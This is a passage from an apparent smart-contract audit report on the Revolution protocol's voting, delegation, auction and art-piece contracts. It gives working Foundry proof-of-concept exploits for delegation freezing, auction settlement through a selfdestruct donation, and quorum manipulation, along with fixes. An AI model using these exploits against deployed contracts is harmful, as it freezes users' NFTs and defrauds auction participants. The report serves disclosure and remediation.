4. The critical part of this attack is that the art piece (IPFS link) that is voted on will differ from the art piece (IPFS link) in the minted VerbsToken which makes this an issue on protocol level where assets are compromised and users will be misled as a result.

On the one hand, users have to be careful and review their actions responsibly, but on the other hand it’s any protocol’s duty to protect users to a certain degree (example: slippage control).

Here, multiple users are put at risk because of one malicious user.

Furthermore, due to the voting mechanism and later minting, users are exposed to a risk that is not as clear to see as if they could see the final NFT from the beginning.

I have to draw the line somewhere and here it becomes evident that the protocol’s duty to protect its users outweighs the required user scrutiny.

Note: See full discussion here.

[H-04] Malicious delegatees can block delegators from redelegating and from sending their NFTs

Submitted by bart1e, also found by 0xDING99YA, BowTiedOriole, and Ward

If user X delegates his votes to Y, Y can block X from redelegating and even from sending his NFT anywhere, forever.

Detailed description

Users can acquire votes in two ways:

- by having some NontransferableERC20Votes tokens

- by having VerbsToken tokens

It is possible for them to delegate their votes to someone else. It is handled in the VotesUpgradable contract, that is derived from OpenZeppelin’s VotesUpgradable and the following change is made with respect to the original implementation:

function delegates(address account) public view virtual returns (address) {

- return $._delegatee[account];

+ return $._delegatee[account] == address(0) ? account : $._delegatee[account];

It is meant to be a convenience feature so that users don’t have to delegate to themselves in order to be able to vote. However, it has very serious implications.

In order to see that, let’s look at the _moveDelegateVotes function that is invoked every time someone delegates his votes or wants to transfer a voting token (VerbsToken in this case as NontransferableERC20Votes is non-transferable):

function _moveDelegateVotes(address from, address to, uint256 amount) private {

VotesStorage storage $ = _getVotesStorage();

if (from != to && amount > 0) {

if (from != address(0)) {

(uint256 oldValue, uint256 newValue) = _push(

$._delegateCheckpoints[from],

_subtract,

SafeCast.toUint208(amount)

);

emit DelegateVotesChanged(from, oldValue, newValue);

}

if (to != address(0)) {

(uint256 oldValue, uint256 newValue) = _push(

$._delegateCheckpoints[to],

_add,

SafeCast.toUint208(amount)

);

emit DelegateVotesChanged(to, oldValue, newValue);

}

}

}

As can be seen, it subtracts votes from the current delegatee and adds them to the new one. There are 2 edge cases here:

- from == address(0), which is the case when the current delegatee equals 0

- to == address(0), which is the case when a user delegates to 0

If either of these conditions holds, only one of the $._delegateCheckpoints entries is updated. This is fine in the original implementation, as the function ignores the case from == to. If the function updates only $._delegateCheckpoints[to] (from == address(0)), the user was delegating to 0, so when he changes delegatee, votes should only be added to some account and not subtracted from any account. Similarly, if the function updates only $._delegateCheckpoints[from] (to == address(0)), the user temporarily removes his votes from the system, so his current delegatee’s votes should be subtracted and not added to any other account.

As long as user cannot cause this function to update one of $._delegateCheckpoints[from] and $._delegateCheckpoints[to] several times in a row, it works correctly. It is indeed the case in the original OpenZeppelin’s implementation as when from == to, function doesn’t perform any operation.

However, the problem with the current implementation is that it is possible to call this function with to == 0 several times in a row. In order to see it, consider the _delegate function which is called when users want to (re)delegate their votes:

function _delegate(address account, address delegatee) internal virtual {

VotesStorage storage $ = _getVotesStorage();

address oldDelegate = delegates(account);

$._delegatee[account] = delegatee;

emit DelegateChanged(account, oldDelegate, delegatee);

_moveDelegateVotes(oldDelegate, delegatee, _getVotingUnits(account));

}

As we can see, it calls _moveDelegateVotes, but with oldDelegate equal to delegates(account). But if $._delegatee[account] == address(0), that function returns account.

It means that _moveDelegateVotes can be called several times in a row with parameters (account, 0, _getVotingUnits(account)). In other words, if user delegates to address(0), he will be able to do it several times in a row as from will be different than to in _moveDelegateVotes and the function will subtract his amount of votes from his $._delegateCheckpoints every time.

It may seem that a user X who delegates to address(0) multiple times will only harm himself, but that is not true: someone else can delegate to him, and each time he delegates to 0, his original voting power will be subtracted from his $._delegateCheckpoints, making it 0 or some small value. If a user Y who delegated to X wants to redelegate to someone else or transfer his tokens, _moveDelegateVotes will revert with an integer underflow, as it will try to subtract Y’s votes from $._delegateCheckpoints[X], which will already be either a small number or even 0. This means that Y will be unable to transfer his tokens or redelegate.
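The accounting described above can be reproduced in isolation. The following is a minimal sketch, not the protocol's VotesUpgradeable: the contract name MiniVotes, the mint helper, and the plain votes mapping (standing in for the checkpoint history) are all assumptions made for illustration.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.22;

/// @notice Illustrative model only. All names here are hypothetical.
contract MiniVotes {
    mapping(address => address) private _delegatee; // raw stored delegatee
    mapping(address => uint256) public votes; // stands in for $._delegateCheckpoints
    mapping(address => uint256) public units; // stands in for _getVotingUnits

    // Hypothetical helper: hands out voting units and credits the current delegate.
    function mint(address to, uint256 amount) external {
        units[to] += amount;
        _move(address(0), delegates(to), amount);
    }

    // Mirrors the modified getter: a stored address(0) is reported as self-delegation.
    function delegates(address account) public view returns (address) {
        address d = _delegatee[account];
        return d == address(0) ? account : d;
    }

    function delegate(address delegatee) external {
        address old = delegates(msg.sender);
        _delegatee[msg.sender] = delegatee;
        _move(old, delegatee, units[msg.sender]);
    }

    function _move(address from, address to, uint256 amount) private {
        if (from != to && amount > 0) {
            // Checked arithmetic: reverts if `from` holds fewer votes than `amount`.
            if (from != address(0)) votes[from] -= amount;
            if (to != address(0)) votes[to] += amount;
        }
    }
}
```

Under these assumptions, with a victim V holding 2 units and an attacker A holding 1: after V delegates to A, votes[A] is 3. Each call of delegate(address(0)) by A subtracts 1 again, because delegates(A) keeps returning A. After two such calls votes[A] is 1, so V's attempt to redelegate tries to subtract 2 from 1 and reverts.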

Impact

Victims of the exploit presented above will neither be able to transfer their NFTs (the same would be true for NontransferableERC20Votes, but it’s not transferable by design) nor to even redelegate back to themselves or to any other address.

While it can be argued that users will only delegate to users they trust, I argue that the issue is of High severity because of the following reasons:

- Possibility of delegating is implemented in the code and it’s expected to be used.

- Every user who uses it risks the loss of access to all his NFTs and to redelegating his votes.

- Even when delegatees are trusted, it still shouldn’t be possible for them to block redelegating and blocking access to NFTs of their delegators; if delegators stop trusting delegatees, they should have a possibility to redelegate back, let alone to have access to their own NFTs, which is not the case in the current implementation.

- The attack is not costly for the attacker as he doesn’t have to lose any tokens - for instance, if he has 1 NFT and the victim who delegates to him has 10, he can delegate to address(0) 10 times and then transfer his NFT to a different address - it will still block his victim and the attacker wouldn’t lose anything.

Proof of Concept

Please put the following test into the Voting.t.sol file and run it. It shows how a victim loses access to all his votes and all his NFTs just by delegating to someone:

function testBlockingOfTransferAndRedelegating() public

{

address user = address(0x1234);

address attacker = address(0x4321);

vm.stopPrank();

// create 3 random pieces

createDefaultArtPiece();

createDefaultArtPiece();

createDefaultArtPiece();

// transfer 2 pieces to normal user and 1 to the attacker

vm.startPrank(address(auction));

erc721Token.mint();

erc721Token.transferFrom(address(auction), user, 0);

erc721Token.mint();

erc721Token.transferFrom(address(auction), user, 1);

erc721Token.mint();

erc721Token.transferFrom(address(auction), attacker, 2);

vm.stopPrank();

// user delegates his votes to attacker

vm.prank(user);

erc721Token.delegate(attacker);

// attacker delegates to address(0) multiple times, blocking user from redelegating

vm.prank(attacker);

erc721Token.delegate(address(0));

vm.prank(attacker);

erc721Token.delegate(address(0));

// now, user cannot redelegate

vm.prank(user);

vm.expectRevert();

erc721Token.delegate(user);

// attacker transfers his only NFT to an address controlled by himself

// he doesn't lose anything, but he still trapped victim's votes and NFTs

vm.prank(attacker);

erc721Token.transferFrom(attacker, address(0x43214321), 2);

// user cannot transfer any of his NFTs either

vm.prank(user);

vm.expectRevert();

erc721Token.transferFrom(user, address(0x1234567890), 0);

}

Tools Used

VS Code

Recommended Mitigation Steps

Do not allow users to delegate to address(0).
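One way the recommendation could look is sketched below. This is an assumption-laden illustration, not the fix from the sponsor's commit: the contract name GuardedDelegation and the error ZeroAddressDelegatee are hypothetical, and _delegate is left abstract so the sketch compiles on its own.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.22;

/// @notice Hypothetical sketch of rejecting address(0) as a delegatee.
abstract contract GuardedDelegation {
    error ZeroAddressDelegatee();

    // Stands in for the existing internal delegation logic.
    function _delegate(address account, address delegatee) internal virtual;

    function delegate(address delegatee) public virtual {
        // With address(0) rejected, the (account, 0, units) move can no longer be repeated.
        if (delegatee == address(0)) revert ZeroAddressDelegatee();
        _delegate(msg.sender, delegatee);
    }
}
```

Any other entry point that reaches _delegate, such as a signature-based delegation function, would presumably need the same guard.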

rocketman-21 (Revolution) confirmed and commented:

This is valid, major find thank you so much.

Proposed fix here: https://github.com/collectivexyz/revolution-protocol/commit/ef2a492e93e683f5d9d8c77cbcf3622bb936522a

Warden has shown how assets can be permanently frozen.

Medium Risk Findings (14)

[M-01] Bidder can use donations to get VerbsToken from auction that already ended

Submitted by jnforja, also found by 0x175, McToady, mahdirostami, MrPotatoMagic, mojito_auditor, deth, 0xDING99YA, TermoHash, _eperezok, 0xCiphky, ktg, and imare (1, 2)

- Token will be auctioned off without following the intended rules resulting in an unfair auction.

- Loss of funds for Creators and AuctionHouse owner.

Proof of Concept

For this attack to be possible it’s necessary that the following happens in the shown order:

- Attacker created a bid.

- AuctionHouse::reservePrice is increased to a value higher than the already placed bid.

- No new bid is created after AuctionHouse::reservePrice is changed and the auction ends.

- Attacker donates through selfdestruct to AuctionHouse the minimum necessary to have address(AuctionHouse).balance be greater than or equal to AuctionHouse::reservePrice.

- Auction is settled.

- Attacker will get the token and creators and AuctionHouse owner will be paid less than expected since their pay will be computed based on _auction.amount, which is lower than the set reservePrice.
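The difference between a balance-based and a bid-based reserve check can be shown in isolation. The sketch below is an illustrative model with hypothetical names (SettleCheckModel, highestBid standing in for _auction.amount), not the AuctionHouse code.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.22;

/// @notice Illustrative model only. All names here are hypothetical.
contract SettleCheckModel {
    uint256 public reservePrice;
    uint256 public highestBid; // stands in for _auction.amount

    // The ETH sent at deployment plays the role of the single bid.
    constructor(uint256 initialReservePrice) payable {
        reservePrice = initialReservePrice;
        highestBid = msg.value;
    }

    function setReservePrice(uint256 newReservePrice) external {
        reservePrice = newReservePrice;
    }

    // Balance-based check: ETH forced in via selfdestruct counts toward it.
    function passesBalanceCheck() external view returns (bool) {
        return address(this).balance >= reservePrice;
    }

    // Bid-based check: only the recorded bid counts.
    function passesBidCheck() external view returns (bool) {
        return highestBid >= reservePrice;
    }
}
```

In this model, raising reservePrice above highestBid makes both checks fail. Forcing the difference into the contract then flips passesBalanceCheck to true while passesBidCheck stays false.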

To execute the following code copy paste it into AuctionSettling.t.sol

function testCircumventsMostCreateBidRestrictionsThroughDonationAndReducesTokenPayments() public {

createDefaultArtPiece();

auction.unpause();

uint256 balanceBefore = address(dao).balance;

uint256 bidAmount = auction.reservePrice();

uint256 reservePriceIncrease = 0.1 ether;

address bidder = address(11);

vm.deal(bidder, bidAmount + reservePriceIncrease);

vm.startPrank(bidder);

auction.createBid{ value: bidAmount }(0, bidder); // Assuming first auction's verbId is 0

vm.stopPrank();

vm.startPrank(auction.owner());

// After setting new ReservePrice current bid won't be enough to win the auction

auction.setReservePrice(auction.reservePrice() + reservePriceIncrease);

assertGt(auction.reservePrice(), bidAmount);

vm.stopPrank();

vm.warp(block.timestamp + auction.duration()); // Fast forward time to end the auction

vm.startPrank(bidder);

ContractDonatesEthThroughSelfdestruct donor = new ContractDonatesEthThroughSelfdestruct{value: reservePriceIncrease}();

donor.donate(payable(address(auction)));

auction.settleCurrentAndCreateNewAuction();

//Through donation bidder was able to get the token even though the auction had already ended.

assertEq(erc721Token.ownerOf(0), bidder);

//Since payments are calculated using _auction.amount all the involved parties will get

//less than they would if reservePrice had been respected.

//Code below shows payments were calculated based on bidAmount which is less than the reservePrice.

uint256 balanceAfter = address(dao).balance;

uint256 creatorRate = auction.creatorRateBps();

uint256 entropyRate = auction.entropyRateBps();

//calculate fee

uint256 amountToOwner = (bidAmount * (10_000 - (creatorRate * entropyRate) / 10_000)) / 10_000;

//amount spent on governance

uint256 etherToSpendOnGovernanceTotal = (bidAmount * creatorRate) /

10_000 -

(bidAmount * (entropyRate * creatorRate)) /

10_000 /

10_000;

uint256 feeAmount = erc20TokenEmitter.computeTotalReward(etherToSpendOnGovernanceTotal);

assertEq(

balanceAfter - balanceBefore,

amountToOwner - feeAmount

);

}

contract ContractDonatesEthThroughSelfdestruct {

constructor() payable {}

function donate(address payable target) public {

selfdestruct(target);

}

}

Recommended Mitigation Steps

Execute the following diff at AuctionHouse::_settleAuction :

- if (address(this).balance < reservePrice) {

+ if (_auction.amount < reservePrice) {

rocketman-21 (Revolution) confirmed and commented:

Ideally the DAO would wait to update the reserve price to line up with the start of a new auction, to ensure some bids will come in. Your call ultimately @0xTheC0der I implemented the fix in any case.

Thanks for the input!

Ideally the DAO would wait to update the reserve price to line up with the start of a new auction

It’s reasonable to assume that this is not always the case, therefore this group of issues remains valid.

The root cause is the change of parameters mid-auction, while the usage of selfdestruct is “just” a very impactful attack path.

Note: See full discussion here.

[M-02] Violation of ERC-721 Standard in VerbsToken:tokenURI Implementation

Submitted by pep7siup, also found by shaka, imare (1, 2), hals, XDZIBECX, ZanyBonzy, _eperezok, and Ocean_Sky

The VerbsToken contract deviates from the ERC-721 standard, specifically in the tokenURI implementation. According to the standard, the tokenURI method must revert if a non-existent tokenId is passed. In the VerbsToken contract, this requirement was overlooked, leading to a violation of the EIP-721 specification and breaking the invariants declared in the protocol’s README.

Proof of Concept

The responsibility for checking whether a token exists may be argued to be placed on the descriptor. However, the core VerbsToken contract, which is expected to adhere to the invariant stated in the Protocol’s README, does not follow the specification.

// File: README.md

## EIP conformity

- [VerbsToken](https://github.com/code-423n4/2023-12-revolutionprotocol/blob/main/packages/revolution/src/VerbsToken.sol): Should comply with `ERC721`

Note: the original NounsToken contract, which VerbsToken was forked from, did implement the tokenURI function properly.

Recommended Mitigation Steps

It is recommended to strictly adopt the implementation from the original NounsToken contract to ensure compliance with the ERC-721 standard.

function tokenURI(uint256 tokenId) public view override returns (string memory) {

+ require(_exists(tokenId));

return descriptor.tokenURI(tokenId, artPieces[tokenId].metadata);

}

References

- EIP-721 Standard

- Code 423n4 Finding - Caviar

- Code 423n4 Finding - OpenDollar

- NounsToken Contract Implementation

I felt obliged to award with Medium severity due to precedent EIP-721 tokenUri cases (see https://github.com/code-423n4/2023-12-revolutionprotocol-findings/issues/511#issuecomment-1883512625, one judged by Alex).

This should be discussed during the next SC round.

[M-03] CultureIndex.sol#dropTopVotedPiece() - Malicious user can manipulate topVotedPiece to DoS the whole CultureIndex and AuctionHouse

Submitted by deth, also found by deth, roland, peanuts (1, 2, 3), Aamir, pontifex, 0xHelium, Pechenite, pep7siup, AkshaySrivastav, ast3ros, ayden, 00xSEV, 0xCiphky (1, 2), King_, Tricko (1, 2), fnanni, ABAIKUNANBAEV, y4y, SpicyMeatball, ke1caM, ptsanev, mahdirostami, bart1e, and rvierdiiev

CultureIndex is responsible for the creation, voting and dropping (auctioning off) art pieces.

Let’s focus on dropTopVotedPiece . The function is used by the AuctionHouse to take the top voted art piece, drop it and auction it off.

function dropTopVotedPiece() public nonReentrant returns (ArtPiece memory) {

require(msg.sender == dropperAdmin, "Only dropper can drop pieces");

ICultureIndex.ArtPiece memory piece = getTopVotedPiece();

require(totalVoteWeights[piece.pieceId] >= piece.quorumVotes, "Does not meet quorum votes to be dropped.");

//set the piece as dropped

pieces[piece.pieceId].isDropped = true;

//slither-disable-next-line unused-return

maxHeap.extractMax();

emit PieceDropped(piece.pieceId, msg.sender);

return pieces[piece.pieceId];

}

Notice how the top voted piece is retrieved and then we check if totalVoteWeights[piece.pieceId] >= piece.quorumVotes. This is used to check if the piece has reached its quorum, which is cached during creation.

newPiece.pieceId = pieceId;

newPiece.totalVotesSupply = _calculateVoteWeight(

erc20VotingToken.totalSupply(),

erc721VotingToken.totalSupply()

);

newPiece.totalERC20Supply = erc20VotingToken.totalSupply();

newPiece.metadata = metadata;

newPiece.sponsor = msg.sender;

newPiece.creationBlock = block.number;

newPiece.quorumVotes = (quorumVotesBPS * newPiece.totalVotesSupply) / 10_000;

Notice that for quorumVotes we use erc20VotingToken.totalSupply, erc721VotingToken.totalSupply and quorumVotesBPS.

Knowing all this, a malicious user can do the following to break dropTopVotedPiece under certain conditions.

He will call ERC20TokenEmitter#buyToken to buy the voting token, which in turn will inflate the erc20VotingToken.totalSupply , which will also increase the newPiece.quorumVotes .

After this he will create a new bogus art piece and its quorum votes will be inflated (We are assuming that no one wants to vote for the art piece as it’s a bogus/fake art piece).

He will then vote for his new piece, making it the top voted piece, but the piece won’t reach its quorum so it cannot be dropped.
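The effect of inflating the supply on the cached quorum follows directly from the formula. Below is a minimal sketch with hypothetical names (QuorumMath and its two functions) that mirrors the two expressions quoted from the report. The figures in the comments are invented for illustration and are not taken from the PoC.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.22;

/// @notice Illustrative helper only. Names and example figures are hypothetical.
contract QuorumMath {
    // Same shape as the vote-weight formula: ERC20 supply plus weighted ERC721 supply.
    function voteWeight(
        uint256 erc20Supply,
        uint256 erc721Supply,
        uint256 erc721Weight
    ) public pure returns (uint256) {
        return erc20Supply + erc721Supply * erc721Weight * 1e18;
    }

    // Same shape as the quorum formula cached at piece creation.
    function quorumVotes(uint256 quorumBps, uint256 totalVotesSupply) public pure returns (uint256) {
        return (quorumBps * totalVotesSupply) / 10_000;
    }

    // Example figures with quorumBps = 6000:
    //   supply 30e18 -> quorum 18e18
    //   supply 45e18 -> quorum 27e18 (after an assumed purchase of 15e18 more tokens)
    // A holder of 25e18 votes can outvote a piece with 10e18 votes,
    // but cannot reach the 27e18 quorum of a piece created after the purchase.
}
```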

At this point one of the following can occur:

- Users will wait for a new piece to be created and become top voted, dropped and auctioned off. The protocol might work normally at this point, but once the bogus/fake piece becomes top voted again, it still can’t be dropped. If the quorum for the fake piece isn’t reached, it can never be dropped, meaning that all pieces that have less votes than it and are eligible to be dropped (they reached their quorum) can never be reached, since the fake piece can technically stay there forever.

- Users will be forced to vote for the bogus/fake piece in order to push it over its quorum so it can be dropped. Obviously this isn’t ideal, as it requires persuading users to spend gas to vote for something that they don’t want, just so the protocol can continue working correctly. After the bogus piece gets dropped it needs to go into an auction, which has a duration, so users will also have to wait for the auction to terminate and get settled before the protocol can continue normally, which will waste time and increase the duration of the DoS.

- Users that voted for a piece that is eligible to be dropped, but doesn’t have more votes than the fake piece, will be forced to create a new piece and start voting all over again. This isn’t ideal, as the quorumVotes for the piece will be different and it isn’t even certain that the new piece will be accepted under the new market conditions.

All 3 of the scenarios are bad for the normal execution of the protocol and especially under scenario 1, can leave pieces to just rot, as they can never be reached.

Note that the malicious user who performs the attack doesn’t lose any funds, as he is just paying to buy the voting token. The scenario can also happen on its own naturally, without the use of buyToken, but it will still lead to 1 of the 3 follow-up scenarios.

This scenario can happen naturally, without anyone being malicious and the attack doesn’t rely on the fact that anyone can call buyToken , it just makes it easier.

The sponsor has stated that in the future there will be contracts that interface with buyToken, so even if access control is added to the function, it still won’t fix the issue.

this is somewhat expected, but i’m not sure if it throws off the economics of the system, but ideally most people are interfacing with buyToken through the AuctionHouse, commerce contracts, or minting contracts, not buying directly.

Proof of Concept

Create a folder inside revolution/test called CustomTests , create a new file called CustomTests.t.sol , paste the following inside and run forge test --mt testTopVotedPieceCantReachQuorum -vvvv.

// SPDX-License-Identifier: MIT

pragma solidity ^0.8.22;

import "forge-std/console.sol";

import { Test } from "forge-std/Test.sol";

import { unsafeWadDiv } from "../../src/libs/SignedWadMath.sol";

import { ERC20TokenEmitter } from "../../src/ERC20TokenEmitter.sol";

import { IERC20TokenEmitter } from "../../src/interfaces/IERC20TokenEmitter.sol";

import { NontransferableERC20Votes } from "../../src/NontransferableERC20Votes.sol";

import { RevolutionProtocolRewards } from "@collectivexyz/protocol-rewards/src/RevolutionProtocolRewards.sol";

import { wadDiv } from "../../src/libs/SignedWadMath.sol";

import { IRevolutionBuilder } from "../../src/interfaces/IRevolutionBuilder.sol";

import { RevolutionBuilderTest } from "../RevolutionBuilder.t.sol";

import { INontransferableERC20Votes } from "../../src/interfaces/INontransferableERC20Votes.sol";

import { ERC1967Proxy } from "../../src/libs/proxy/ERC1967Proxy.sol";

import { IERC20 } from "@openzeppelin/contracts/token/ERC20/IERC20.sol";

import { CultureIndex } from "../../src/CultureIndex.sol";

import { ICultureIndex } from "../../src/interfaces/ICultureIndex.sol";

contract ERC20TokenEmitterTest is RevolutionBuilderTest {

event Log(string, uint);

// 1,000 tokens per day is the target emission

uint256 tokensPerTimeUnit = 1_000;

uint256 expectedVolume = tokensPerTimeUnit * 1e18;

string public tokenNamePrefix = "Vrb";

function setUp() public override {

super.setUp();

super.setMockParams();

super.setERC721TokenParams("Mock", "MOCK", "https://example.com/token/", tokenNamePrefix);

int256 oneFullTokenTargetPrice = 1 ether;

int256 priceDecayPercent = 1e18 / 10;

super.setERC20TokenEmitterParams(

oneFullTokenTargetPrice,

priceDecayPercent,

int256(1e18 * tokensPerTimeUnit),

creatorsAddress

);

super.deployMock();

vm.deal(address(0), 100000 ether);

}

function testTopVotedPieceCantReachQuorum() public {

// Setup no fees for the creator for simplicity of the test and the values

vm.startPrank(erc20TokenEmitter.owner());

erc20TokenEmitter.setCreatorsAddress(address(1));

erc20TokenEmitter.setCreatorRateBps(0);

erc20TokenEmitter.setEntropyRateBps(0);

vm.stopPrank();

// Set quorumVotesBps to 6000 (60%)

vm.prank(cultureIndex.owner());

cultureIndex._setQuorumVotesBPS(6000);

// Setup Alice, Bob and Charlie

address alice = address(9);

vm.deal(alice, 100000 ether);

address bob = address(10);

vm.deal(bob, 100000 ether);

address charlie = address(11);

vm.deal(charlie, 100000 ether);

// Bob buys tokens

address[] memory recipients = new address[](1);

recipients[0] = bob;

uint256[] memory bps = new uint256[](1);

bps[0] = 10_000;

vm.prank(bob);

erc20TokenEmitter.buyToken{ value: 10e18 }(

recipients,

bps,

IERC20TokenEmitter.ProtocolRewardAddresses({

builder: address(0),

purchaseReferral: address(0),

deployer: address(0)

})

);

// Charlie buys tokens

recipients = new address[](1);

recipients[0] = charlie;

bps = new uint256[](1);

bps[0] = 10_000;

vm.prank(charlie);

erc20TokenEmitter.buyToken{ value: 10e18 }(

recipients,

bps,

IERC20TokenEmitter.ProtocolRewardAddresses({

builder: address(0),

purchaseReferral: address(0),

deployer: address(0)

})

);

// Alice buys tokens

recipients = new address[](1);

recipients[0] = alice;

bps = new uint256[](1);

bps[0] = 10_000;

vm.prank(alice);

erc20TokenEmitter.buyToken{ value: 10e18 }(

recipients,

bps,

IERC20TokenEmitter.ProtocolRewardAddresses({

builder: address(0),

purchaseReferral: address(0),

deployer: address(0)

})

);

vm.roll(block.number + 10);

// Bob creates a piece

vm.prank(bob);

uint256 bobsPiece = createDefaultArtPiece(bob);

vm.roll(block.number + 10);

// Bob votes for his piece

vm.prank(bob);

cultureIndex.vote(bobsPiece);

// Bob's piece is the top voted one

assertEq(cultureIndex.topVotedPieceId(), bobsPiece);

// Bob's piece hasn't passed its quorum

ICultureIndex.ArtPiece memory piece = cultureIndex.getTopVotedPiece();

assertLt(cultureIndex.totalVoteWeights(piece.pieceId), piece.quorumVotes);

// Alice buys tokens again

recipients = new address[](1);

recipients[0] = alice;

bps = new uint256[](1);

bps[0] = 10_000;

vm.prank(alice);

erc20TokenEmitter.buyToken{ value: 15e18 }(

recipients,

bps,

IERC20TokenEmitter.ProtocolRewardAddresses({

builder: address(0),

purchaseReferral: address(0),

deployer: address(0)

})

);

vm.roll(block.number + 1);

// Alice creates a piece

vm.prank(alice);

uint256 alicesPiece = createDefaultArtPiece(alice);

vm.roll(block.number + 1);

// Alice votes on her piece next block

// She votes enough to be the top voted piece, but not enough to pass her quorum

vm.prank(alice);

cultureIndex.vote(alicesPiece);

// Now Alice's piece is the top voted one

assertEq(cultureIndex.topVotedPieceId(), alicesPiece);

// Her piece is the top voted one, but hasn't reached her quorum

piece = cultureIndex.getTopVotedPiece();

assertLt(cultureIndex.totalVoteWeights(piece.pieceId), piece.quorumVotes);

assertEq(piece.pieceId, alicesPiece);

// Alice's piece cannot be dropped

vm.startPrank(cultureIndex.dropperAdmin());

vm.expectRevert();

cultureIndex.dropTopVotedPiece();

// At this point Alice's piece will stay top voted,

// Since Bob and Charlie don't want to vote on her art piece

// Even if they did, this way an unpopular art piece might be forced into

// being auctioned off in the AuctionHouse, which will DoS the users of the protocol for even longer

}

function createArtPiece(

string memory name,

string memory description,

ICultureIndex.MediaType mediaType,

string memory image,

string memory text,

string memory animationUrl,

address creatorAddress,

uint256 creatorBps

) internal returns (uint256) {

ICultureIndex.ArtPieceMetadata memory metadata = ICultureIndex.ArtPieceMetadata({

name: name,

description: description,

mediaType: mediaType,

image: image,

text: text,

animationUrl: animationUrl

});

ICultureIndex.CreatorBps[] memory creators = new ICultureIndex.CreatorBps[](1);

creators[0] = ICultureIndex.CreatorBps({ creator: creatorAddress, bps: creatorBps });

return cultureIndex.createPiece(metadata, creators);

}

function createDefaultArtPiece(address creator) public returns (uint256) {

return

createArtPiece(

"Mona Lisa",

"A masterpiece",

ICultureIndex.MediaType.IMAGE,

"ipfs://legends",

"",

"",

creator,

10000

);

}

}

Tools Used

Foundry

Recommended Mitigation Steps

There isn’t a very elegant way to fix this, as this is how a Max Heap is supposed to function. One way is to add an admin function that can forcefully drop a piece from the Max Heap.

rocketman-21 (Revolution) acknowledged and commented:

One potential solution here is to let the DAO vote to axe the vote weight of malicious pieces that attempt to do this.

In any case, assuming most actors in the community are good, the artists can just garner more votes than the malicious piece to bypass this issue.

Imho we cannot rely on most community members acting in good faith 100% of the time to prevent this from happening, therefore I am leaning more towards Medium severity since the protocol and good faith actors can be negatively impacted by this attack.

Furthermore, there is currently no way to easily circumvent this problem.

rocketman-21 (Revolution) commented:

Right @0xTheC0der but it assumes malicious vote weight > the remaining vote weight of “good” active users > quorum.

It assumes these “good users” are unable to vote for a good piece to reach the top voted piece spot.

imo there could be some severe edge cases where voter apathy paired with a low quorum could make this possible, but with a sufficient active voting base and a solid quorum, I don’t think the assumption that a malicious user will always be able to have the largest amount of vote weight vs. everyone else actually holds up in a real world scenario?

if quorum is low and voter turnout is low that’s a different story.

It’s a balancing act - if the quorum is too high this can happen in any case. I think this is fair on second thought in some edge cases, just not sure how to fix.

osmanozdemir1 (Warden) commented:

Hi @0xTheC0der Thanks for judging this contest.

The explained scenario can be produced as a PoC, but it isn’t realistic for an active protocol with tens/hundreds of users.

For this to happen:

- Fake art piece must be top voted.

- But it also must not reach the quorum.

- And other pieces must have fewer votes than the fake one, but also reach the quorum.

Besides,

Note that the malicious user that does the attack, doesn’t lose any funds, as he is just paying to buy the voting token

This implies the attack is not costly, but that is incorrect since the voting token is not transferable. The attacker cannot sell or swap these tokens. “Just paying to buy voting token” is in fact a huge cost for a token that is worth nothing in terms of money. The attacker’s voting power also needs to be more than everyone else’s total voting power to actually perform this attack. If the community can surpass the vote count of the attacker’s fake piece, the attacker must create another fake art piece and must buy additional voting power.

Thanks everyone for their input!

I agree that the attack path is rather hand-wavy. However, the described problem can also occur naturally without an attacker.

See report:

This scenario can happen naturally, without anyone being malicious and the attack doesn’t rely on the fact that anyone can call buyToken, it just makes it easier.

See sponsor:

It’s a balancing act - if the quorum is too high this can happen in any case. I think this is fair on second thought in some edge cases, just not sure how to fix

As the report also comes with a PoC (even though with an attacker) that proves that the protocol can be brought into this state, maintaining Medium severity seems appropriate.

[M-04] The quorumVotes can be bypassed

Submitted by ast3ros, also found by Pechenite, dimulski, peanuts, KupiaSec, cccz, mojito_auditor, deth, 0xG0P1, zhaojie, osmanozdemir1, and rvierdiiev

This vulnerability allows for the minting and auctioning of an art piece that has not met the required quorum. It enables malicious voters to influence outcomes with fewer votes than what is stipulated by the protocol. This undermines a key invariant of the protocol:

An art piece that has not met quorum cannot be dropped.

Proof of Concept

The quorumVotes for an art piece are calculated at its creation as a fraction of the totalVotesSupply, which depends on the total supply of erc20VotingToken and erc721VotingToken:

(quorumVotesBPS * newPiece.totalVotesSupply) / 10_000.

File: src/CultureIndex.sol

function createPiece(

ArtPieceMetadata calldata metadata,

CreatorBps[] calldata creatorArray

) public returns (uint256) {

uint256 creatorArrayLength = validateCreatorsArray(creatorArray);

// Validate the media type and associated data

validateMediaType(metadata);

uint256 pieceId = _currentPieceId++;

/// @dev Insert the new piece into the max heap

maxHeap.insert(pieceId, 0);

ArtPiece storage newPiece = pieces[pieceId];

newPiece.pieceId = pieceId;

newPiece.totalVotesSupply = _calculateVoteWeight(

erc20VotingToken.totalSupply(),

erc721VotingToken.totalSupply()

);

newPiece.totalERC20Supply = erc20VotingToken.totalSupply();

newPiece.metadata = metadata;

newPiece.sponsor = msg.sender;

newPiece.creationBlock = block.number;

newPiece.quorumVotes = (quorumVotesBPS * newPiece.totalVotesSupply) / 10_000;

The totalVotesSupply is calculated using the total supply of erc20VotingToken and erc721VotingToken at the time the piece is created. It is intended to capture all the voting power that can vote for this art piece.

File: src/CultureIndex.sol

function _calculateVoteWeight(uint256 erc20Balance, uint256 erc721Balance) internal view returns (uint256) {

return erc20Balance + (erc721Balance * erc721VotingTokenWeight * 1e18);

}

The vulnerability arises because the totalVotesSupply is computed based on the token supplies at the time of art piece creation. However, due to the block-based clock mode in the vote checkpoint, the total supplies of erc20VotingToken and erc721VotingToken can increase within the same block, resulting in an underestimation of totalVotesSupply and consequently, quorumVotes.

File: src/base/VotesUpgradeable.sol

/**

* @dev Clock used for flagging checkpoints. Can be overridden to implement timestamp based

* checkpoints (and voting), in which case {CLOCK_MODE} should be overridden as well to match.

*/

function clock() public view virtual returns (uint48) {

return Time.blockNumber();

}

Possible attack scenarios include:

- A voter back-running the createPiece transaction and purchasing governance tokens in the same block, thereby artificially lowering the quorumVotes.

- A creator front-running a significant token purchase or auction settlement, leading to a similar underestimation of quorumVotes.
